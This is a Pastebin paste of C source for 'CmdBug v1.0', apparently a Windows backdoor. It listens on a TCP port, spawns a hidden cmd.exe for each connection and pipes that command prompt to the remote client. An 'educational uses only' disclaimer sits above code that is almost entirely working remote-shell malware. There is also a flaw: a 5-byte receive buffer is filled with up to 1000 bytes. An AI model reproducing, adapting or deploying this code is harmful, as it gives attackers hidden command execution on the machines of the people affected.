Advertisement
FlyFar

CmdBug - Remote Shell - Source Code

Mar 23rd, 2023
1,016
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 3.96 KB | Cybersecurity | 0 0
  1. /*****************************************************\
  2. |******************* CmdBug v1.0 *********************|
  3. |****************** Coded By Ecks ********************|
  4. |*****************************************************|
  5. | This program is for educational uses only. It is not|
  6. | intended to be compiled, tested, run, or distributed|
  7. | in any way. If you break these terms you take full  |
  8. | responsibility for anything your actions may cause. |
  9. \*****************************************************/
  10.  
  11. #include <windows.h>
  12. #include <winsock2.h>
  13.  
  14. DWORD WINAPI HandleScks(LPVOID lpParam);
  15.  
  16. int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nCmdShow)
  17. {
  18.     CreateMutex(NULL, TRUE, "[~C~m~d~B~u~g~]");
  19.     if(GetLastError() == ERROR_ALREADY_EXISTS) return 0;
  20.      
  21.     WSADATA wsaDat;
  22.     if(WSAStartup(MAKEWORD(2, 2), &wsaDat) != NO_ERROR) return 0;
  23.      
  24.     SOCKET listenSck = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  25.     if(listenSck == INVALID_SOCKET) goto cleanup;
  26.      
  27.     sockaddr_in service;
  28.     service.sin_family = AF_INET;
  29.     service.sin_addr.s_addr = inet_addr("127.0.0.1");
  30.     service.sin_port = htons(103);
  31.     if(bind(listenSck, (sockaddr*)&service, sizeof(service)) == SOCKET_ERROR) goto cleanup;
  32.      
  33.     if(listen(listenSck, 1) == SOCKET_ERROR) goto cleanup;
  34.      
  35.     SOCKET acceptSck;
  36.     while(1) {
  37.         acceptSck = accept(listenSck, NULL, NULL);
  38.         if(acceptSck != INVALID_SOCKET)
  39.             CreateThread(NULL, 0, HandleScks, (LPVOID)acceptSck, 0, NULL);
  40.     }
  41.      
  42.     cleanup:
  43.         closesocket(acceptSck);
  44.         closesocket(listenSck);
  45.         WSACleanup();
  46.     return 0;
  47. }
  48.  
  49. DWORD WINAPI HandleScks(LPVOID lpParam)
  50. {
  51.     SOCKET theSck = (SOCKET)lpParam;
  52.     HANDLE stdinRd, stdinWr, stdoutRd, stdoutWr;
  53.     SECURITY_ATTRIBUTES sa = {sizeof(SECURITY_ATTRIBUTES), NULL, true};
  54.     STARTUPINFO si;
  55.     PROCESS_INFORMATION pi;
  56.     DWORD stuff;
  57.     char buff[1000], recvBuff[5];
  58.     bool firstsend;
  59.     int offset = 0, bRecv;
  60.      
  61.     if(send(theSck, "Welcome To The CmdBug Server v1.0\r\nStarting The Remote Shell...\r\n\r\n\r\n", 69, 0) == SOCKET_ERROR) goto closeSck;
  62.      
  63.     if(!CreatePipe(&stdinRd, &stdinWr, &sa, 0) || !CreatePipe(&stdoutRd, &stdoutWr, &sa, 0)) {
  64.         send(theSck, "Error Creating Pipes For Remote Shell. Closing Connection...", 60, 0);
  65.         goto closeSck;
  66.     }
  67.      
  68.     GetStartupInfo(&si);
  69.     si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  70.     si.wShowWindow = SW_HIDE;
  71.     si.hStdOutput = stdoutWr;
  72.     si.hStdError = stdoutWr;
  73.     si.hStdInput = stdinRd;
  74.     if(!CreateProcess("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi)) {
  75.         send(theSck, "Error Spawning Command Prompt. Closing Connection...", 52, 0);
  76.         goto closeSck;
  77.     }
  78.      
  79.     while(1) {
  80.         Sleep(100);
  81.         GetExitCodeProcess(pi.hProcess, &stuff);
  82.         if(stuff != STILL_ACTIVE) break;
  83.          
  84.         PeekNamedPipe(stdoutRd, NULL, 0, NULL, &stuff, NULL);
  85.         if(stuff != 0) {
  86.             ZeroMemory(buff, sizeof(buff));
  87.             firstsend = true;
  88.             do {
  89.                 ReadFile(stdoutRd, buff, 1000, &stuff, NULL);
  90.                 if(firstsend) { send(theSck, buff + offset, strlen(buff) - offset, 0); firstsend = false; }
  91.                 else send(theSck, buff, strlen(buff), 0);
  92.             } while(stuff == 1000);
  93.         }
  94.          
  95.         if(!strcmp(recvBuff, "\r\n")) offset = 0;
  96.         bRecv = recv(theSck, recvBuff, 1000, 0);
  97.         if( (bRecv == 0) || (bRecv == SOCKET_ERROR) ) break;
  98.         recvBuff[bRecv] = '\0';
  99.         WriteFile(stdinWr, recvBuff, strlen(recvBuff), &stuff, NULL);
  100.         offset = offset + bRecv;
  101.     }
  102.      
  103.     closeSck:
  104.         TerminateProcess(pi.hProcess, 0);
  105.         CloseHandle(stdinRd);
  106.         CloseHandle(stdinWr);
  107.         CloseHandle(stdoutRd);
  108.         CloseHandle(stdoutWr);
  109.         closesocket(theSck);
  110.     return 0;
  111. }
  112.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement